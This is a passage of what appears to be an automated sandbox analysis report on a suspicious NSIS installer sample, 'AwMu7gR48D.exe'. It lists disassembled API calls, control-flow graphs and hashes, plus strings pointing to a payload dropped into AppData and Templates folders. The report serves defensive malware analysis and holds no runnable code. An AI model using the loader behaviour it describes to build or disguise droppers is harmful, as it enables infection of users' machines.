                                                                              • SHGetSpecialFolderLocation.SHELL32(0040508E,00000000,?,Completed,00000000,0040508E,Completed,00000000), ref: 004060CB
                                                                              • SHGetPathFromIDListA.SHELL32(00000000,: Completed), ref: 004060D9
                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004060E5
                                                                              • lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406109
                                                                              • lstrlenA.KERNEL32(: Completed,?,Completed,00000000,0040508E,Completed,00000000,00000000,0040E8C0,00000000), ref: 0040615B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                              • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                              • API String ID: 717251189-905382516
                                                                              • Opcode ID: 4b83501bff14d3d4afc94545923638de13eab7723713207b83caa633bdf47479
                                                                              • Instruction ID: ad9c483c4d11e0ac1e74b91e3c17e9742ad78b5bc63621c1ce792900c2eda604
                                                                              • Opcode Fuzzy Hash: 4b83501bff14d3d4afc94545923638de13eab7723713207b83caa633bdf47479
                                                                              • Instruction Fuzzy Hash: 5361D0B1A00115ABDF209F64CD81BBA7BB4DB45304F15813FEA03BA2D2D27C4962DB5E

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 562 401759-40177c call 402ac1 call 405934 567 401786-401798 call 405f2f call 4058c7 lstrcatA 562->567 568 40177e-401784 call 405f2f 562->568 573 40179d-4017a3 call 406199 567->573 568->573 578 4017a8-4017ac 573->578 579 4017ae-4017b8 call 406232 578->579 580 4017df-4017e2 578->580 587 4017ca-4017dc 579->587 588 4017ba-4017c8 CompareFileTime 579->588 581 4017e4-4017e5 call 405aa3 580->581 582 4017ea-401806 call 405ac8 580->582 581->582 590 401808-40180b 582->590 591 40187e-4018a7 call 405056 call 402f81 582->591 587->580 588->587 592 401860-40186a call 405056 590->592 593 40180d-40184f call 405f2f * 2 call 405f51 call 405f2f call 40564b 590->593 603 4018a9-4018ad 591->603 604 4018af-4018bb SetFileTime 591->604 605 401873-401879 592->605 593->578 625 401855-401856 593->625 603->604 607 4018c1-4018cc CloseHandle 603->607 604->607 608 40295a 605->608 611 402951-402954 607->611 612 4018d2-4018d5 607->612 613 40295c-402960 608->613 611->608 615 4018d7-4018e8 call 405f51 lstrcatA 612->615 616 4018ea-4018ed call 405f51 612->616 622 4018f2-4022e6 call 40564b 615->622 616->622 622->611 622->613 625->605 627 401858-401859 625->627 627->592
                                                                              APIs
                                                                              • lstrcatA.KERNEL32(00000000,00000000,307,C:\Users\user\AppData\Local\unshabbily\Hardwire,00000000,00000000,00000031), ref: 00401798
                                                                              • CompareFileTime.KERNEL32(-00000014,?,307,307,00000000,00000000,307,C:\Users\user\AppData\Local\unshabbily\Hardwire,00000000,00000000,00000031), ref: 004017C2
                                                                                • Part of subcall function 00405F2F: lstrcpynA.KERNEL32(?,?,00000400,0040328D,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F3C
                                                                                • Part of subcall function 00405056: lstrlenA.KERNEL32(Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000,?), ref: 0040508F
                                                                                • Part of subcall function 00405056: lstrlenA.KERNEL32(004030B1,Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000), ref: 0040509F
                                                                                • Part of subcall function 00405056: lstrcatA.KERNEL32(Completed,004030B1,004030B1,Completed,00000000,0040E8C0,00000000), ref: 004050B2
                                                                                • Part of subcall function 00405056: SetWindowTextA.USER32(Completed,Completed), ref: 004050C4
                                                                                • Part of subcall function 00405056: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050EA
                                                                                • Part of subcall function 00405056: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405104
                                                                                • Part of subcall function 00405056: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405112
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                              • String ID: 307$C:\Users\user\AppData\Local\unshabbily\Hardwire$open C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Hilltrot242.Boo
                                                                              • API String ID: 1941528284-2746477103
                                                                              • Opcode ID: b7839a92209b7c6b3c8202a481ff6992844c1a0f6516a3d4c6bbc740c4310d88
                                                                              • Instruction ID: 5e97bff851cc073dc2a03fd3a0d2357d8c44b4856d4f0a7a75adeada814ade30
                                                                              • Opcode Fuzzy Hash: b7839a92209b7c6b3c8202a481ff6992844c1a0f6516a3d4c6bbc740c4310d88
                                                                              • Instruction Fuzzy Hash: 7A41E771A10516BACF107BA5DC86DAF3A78DF45369B20823BF525F11E1C63C8A418E6D

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 629 405056-40506b 630 405121-405125 629->630 631 405071-405083 629->631 632 405085-405089 call 405f51 631->632 633 40508e-40509a lstrlenA 631->633 632->633 635 4050b7-4050bb 633->635 636 40509c-4050ac lstrlenA 633->636 638 4050ca-4050ce 635->638 639 4050bd-4050c4 SetWindowTextA 635->639 636->630 637 4050ae-4050b2 lstrcatA 636->637 637->635 640 4050d0-405112 SendMessageA * 3 638->640 641 405114-405116 638->641 639->638 640->641 641->630 642 405118-40511b 641->642 642->630
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000,?), ref: 0040508F
                                                                              • lstrlenA.KERNEL32(004030B1,Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000), ref: 0040509F
                                                                              • lstrcatA.KERNEL32(Completed,004030B1,004030B1,Completed,00000000,0040E8C0,00000000), ref: 004050B2
                                                                              • SetWindowTextA.USER32(Completed,Completed), ref: 004050C4
                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050EA
                                                                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405104
                                                                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405112
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                              • String ID: Completed
                                                                              • API String ID: 2531174081-3087654605
                                                                              • Opcode ID: 7a30fd5aa95a704ddc080644221cac8ba995af417aa6bdfbb55c98406b985727
                                                                              • Instruction ID: e673b9bb112aa3472437e231988a5d641118b75a6dbc9ddacfe4bdcedf5bb5e7
                                                                              • Opcode Fuzzy Hash: 7a30fd5aa95a704ddc080644221cac8ba995af417aa6bdfbb55c98406b985727
                                                                              • Instruction Fuzzy Hash: 49217A71A00508BBDF11DFA5DD80ADFBFA9EB08354F14807AF944A6291C2788A41CFA8

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 643 40551c-405567 CreateDirectoryA 644 405569-40556b 643->644 645 40556d-40557a GetLastError 643->645 646 405594-405596 644->646 645->646 647 40557c-405590 SetFileSecurityA 645->647 647->644 648 405592 GetLastError 647->648 648->646
                                                                              APIs
                                                                              • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040555F
                                                                              • GetLastError.KERNEL32 ref: 00405573
                                                                              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405588
                                                                              • GetLastError.KERNEL32 ref: 00405592
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                              • API String ID: 3449924974-3398839520
                                                                              • Opcode ID: 96d3186a9d907c4a04f4d560a3e7b71f397f10da171c1ba48397c58d76b22fd5
                                                                              • Instruction ID: 8a370a5fbdfdad71dc8e0bfd81c54348e454926cd11c3a1ff2f48966e6f5c6f5
                                                                              • Opcode Fuzzy Hash: 96d3186a9d907c4a04f4d560a3e7b71f397f10da171c1ba48397c58d76b22fd5
                                                                              • Instruction Fuzzy Hash: D0010871D04259EAEF01DBA1CC447EFBBB9EB04354F00857AD904B6290E378A604CFAA

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 649 406259-406279 GetSystemDirectoryA 650 40627b 649->650 651 40627d-40627f 649->651 650->651 652 406281-406289 651->652 653 40628f-406291 651->653 652->653 654 40628b-40628d 652->654 655 406292-4062c4 wsprintfA LoadLibraryExA 653->655 654->655
                                                                              APIs
                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406270
                                                                              • wsprintfA.USER32 ref: 004062A9
                                                                              • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062BD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                              • String ID: %s%s.dll$UXTHEME$\
                                                                              • API String ID: 2200240437-4240819195
                                                                              • Opcode ID: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
                                                                              • Instruction ID: 482dcefc063d93e198aa1db7e000bfd15e9281d4181d763578a6ff71fc22a1d9
                                                                              • Opcode Fuzzy Hash: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
                                                                              • Instruction Fuzzy Hash: EAF0F630A10109AEDF14ABA4DD0DFFB375CAB08304F1405BAB64AE11D2E678E9248B69

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 656 402f81-402f95 657 402f97 656->657 658 402f9e-402fa6 656->658 657->658 659 402fa8 658->659 660 402fad-402fb2 658->660 659->660 661 402fc2-402fcf call 40315d 660->661 662 402fb4-402fbd call 403173 660->662 666 403114 661->666 667 402fd5-402fd9 661->667 662->661 668 403116-403117 666->668 669 4030fd-4030ff 667->669 670 402fdf-402fff GetTickCount call 4063ec 667->670 671 403156-40315a 668->671 672 403101-403104 669->672 673 403148-40314c 669->673 680 403153 670->680 681 403005-40300d 670->681 676 403106 672->676 677 403109-403112 call 40315d 672->677 678 403119-40311f 673->678 679 40314e 673->679 676->677 677->666 689 403150 677->689 683 403121 678->683 684 403124-403132 call 40315d 678->684 679->680 680->671 685 403012-403020 call 40315d 681->685 686 40300f 681->686 683->684 684->666 693 403134-403140 call 405b6f 684->693 685->666 694 403026-40302f 685->694 686->685 689->680 699 403142-403145 693->699 700 4030f9-4030fb 693->700 696 403035-403052 call 40640c 694->696 702 4030f5-4030f7 696->702 703 403058-40306f GetTickCount 696->703 699->673 700->668 702->668 704 403071-403079 703->704 705 4030b4-4030b6 703->705 708 403081-4030ac MulDiv wsprintfA call 405056 704->708 709 40307b-40307f 704->709 706 4030b8-4030bc 705->706 707 4030e9-4030ed 705->707 710 4030d1-4030d7 706->710 711 4030be-4030c3 call 405b6f 706->711 707->681 712 4030f3 707->712 716 4030b1 708->716 709->705 709->708 715 4030dd-4030e1 710->715 717 4030c8-4030ca 711->717 712->680 715->696 718 4030e7 715->718 716->705 717->700 719 4030cc-4030cf 717->719 718->680 719->715
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: CountTick$wsprintf
                                                                              • String ID: ... %d%%
                                                                              • API String ID: 551687249-2449383134
                                                                              • Opcode ID: 167b5ca0bfb3e57695ff9e62e4c69d0835ce9269e9eafab78b1523a358312806
                                                                              • Instruction ID: 60d675f18a734e15d0b5dd350d1cecbd4da5e6a0cde0341d3a53a3cb480860e8
                                                                              • Opcode Fuzzy Hash: 167b5ca0bfb3e57695ff9e62e4c69d0835ce9269e9eafab78b1523a358312806
                                                                              • Instruction Fuzzy Hash: FA519F71901219DBCB10EF65D9046AF7BB8AB04756F14413BF811B72C1C7789E51CBAA

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 720 405af7-405b01 721 405b02-405b2d GetTickCount GetTempFileNameA 720->721 722 405b3c-405b3e 721->722 723 405b2f-405b31 721->723 725 405b36-405b39 722->725 723->721 724 405b33 723->724 724->725
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00405B0B
                                                                              • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B25
                                                                              Strings
                                                                              • "C:\Users\user\Desktop\AwMu7gR48D.exe", xrefs: 00405AF7
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405AFA
                                                                              • nsa, xrefs: 00405B02
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: CountFileNameTempTick
                                                                              • String ID: "C:\Users\user\Desktop\AwMu7gR48D.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                              • API String ID: 1716503409-2439133018
                                                                              • Opcode ID: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
                                                                              • Instruction ID: d7521d4eade0cbd7120b41c29d2b11454b957a1e542ceee7a25420a70a1b98fd
                                                                              • Opcode Fuzzy Hash: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
                                                                              • Instruction Fuzzy Hash: CFF082367082047BDB108F56DC04B9B7FA8DF91750F10803BFA08AA291D6B4B9558B69

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 726 401ffd-402009 727 4020c4-4020c6 726->727 728 40200f-402025 call 402ac1 * 2 726->728 730 402237-40223c call 401423 727->730 738 402034-402042 LoadLibraryExA 728->738 739 402027-402032 GetModuleHandleA 728->739 735 402951-402960 730->735 736 402716-40271d 730->736 736->735 741 402044-402051 GetProcAddress 738->741 742 4020bd-4020bf 738->742 739->738 739->741 744 402090-402095 call 405056 741->744 745 402053-402059 741->745 742->730 749 40209a-40209d 744->749 747 402072-402086 745->747 748 40205b-402067 call 401423 745->748 751 40208b-40208e 747->751 748->749 757 402069-402070 748->757 749->735 752 4020a3-4020ab call 40371f 749->752 751->749 752->735 758 4020b1-4020b8 FreeLibrary 752->758 757->749 758->735
                                                                              APIs
                                                                              • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402028
                                                                                • Part of subcall function 00405056: lstrlenA.KERNEL32(Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000,?), ref: 0040508F
                                                                                • Part of subcall function 00405056: lstrlenA.KERNEL32(004030B1,Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000), ref: 0040509F
                                                                                • Part of subcall function 00405056: lstrcatA.KERNEL32(Completed,004030B1,004030B1,Completed,00000000,0040E8C0,00000000), ref: 004050B2
                                                                                • Part of subcall function 00405056: SetWindowTextA.USER32(Completed,Completed), ref: 004050C4
                                                                                • Part of subcall function 00405056: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050EA
                                                                                • Part of subcall function 00405056: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405104
                                                                                • Part of subcall function 00405056: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405112
                                                                              • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402038
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00402048
                                                                              • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                              • String ID:
                                                                              • API String ID: 2987980305-0
                                                                              • Opcode ID: 3ec78819d622ed86bae178855df993612b78117d9056a0a9d79db71722311b1c
                                                                              • Instruction ID: 772c7401ca61f63a6a86f526de26f8a62e510dd82d200dd974b96084c7de1680
                                                                              • Opcode Fuzzy Hash: 3ec78819d622ed86bae178855df993612b78117d9056a0a9d79db71722311b1c
                                                                              • Instruction Fuzzy Hash: 7F21DB71B04225B7CF207FA48E49B6E7A70AB44358F20413BFB15B22D0D7BD8942D65E
                                                                              APIs
                                                                                • Part of subcall function 00405960: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nspE492.tmp,?,004059CC,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040596E
                                                                                • Part of subcall function 00405960: CharNextA.USER32(00000000), ref: 00405973
                                                                                • Part of subcall function 00405960: CharNextA.USER32(00000000), ref: 00405987
                                                                              • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                • Part of subcall function 0040551C: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040555F
                                                                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\unshabbily\Hardwire,00000000,00000000,000000F0), ref: 0040163C
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\unshabbily\Hardwire, xrefs: 00401631
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                              • String ID: C:\Users\user\AppData\Local\unshabbily\Hardwire
                                                                              • API String ID: 1892508949-3099227325
                                                                              • Opcode ID: c3dc61fa4864d68a63a0ff324977f2f4971824b7823c1438af4a242a8e85a59c
                                                                              • Instruction ID: a466de0d3f6f2377f24be2a4188d25ee0cffe6e715a209702fc6e54bc549958f
                                                                              • Opcode Fuzzy Hash: c3dc61fa4864d68a63a0ff324977f2f4971824b7823c1438af4a242a8e85a59c
                                                                              • Instruction Fuzzy Hash: 78112731608151EBCF217FB54C415BF2AB0DA96324B28053FE8D1B22E2D63D4D429A3F
                                                                              APIs
                                                                              • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,: Completed,?,?,?,?,00000002,: Completed,?,0040605A,80000002), ref: 00405E5C
                                                                              • RegCloseKey.KERNELBASE(?,?,0040605A,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,?,Completed), ref: 00405E67
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
